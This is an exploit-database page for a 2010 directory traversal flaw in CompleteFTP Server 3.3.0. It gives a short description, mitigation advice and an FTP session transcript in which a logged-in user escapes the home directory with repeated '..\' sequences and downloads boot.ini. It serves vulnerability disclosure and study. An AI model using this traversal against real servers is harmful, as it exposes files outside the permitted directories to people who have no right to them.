header-logo
Suggest Exploit
vendor:
CompleteFTP
by:
zombiefx darkernet@gmail.com
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: CompleteFTP
Affected Version From: 3.3.0
Affected Version To: 3.3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:enterprisedt:completeftp:3.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

CompleteFTP Server Directory Traversal

CompleteFTP Server is vulnerable to a directory traversal attack, allowing an attacker to access files and directories outside of the web root directory. This can be exploited by sending a specially crafted FTP request containing '..' directory traversal sequences. An attacker can use this vulnerability to gain access to sensitive files and directories outside of the web root directory.

Mitigation:

Ensure that user input is validated and filtered to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: CompleteFTP Server Directory Traversal
# Date: 2010-03-30
# Author: zombiefx darkernet@gmail.com<mailto:darkernet@gmail.com>
# Software Link: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE :
# Code :
230 User test logged in.
ftp> pwd
257 "/Home/test" is current directory.
ftp> cd ..\..\..\..\..\..\..\..\
250 Directory changed to "/Home/test/..\..\..\..\..\..\..\..\".
ftp> get boot.ini
200 PORT command successful.
150 Opening ASCII mode data connection for boot.ini
226 Transfer complete.
ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.

Navigation

Suggest Exploit

Services By CQR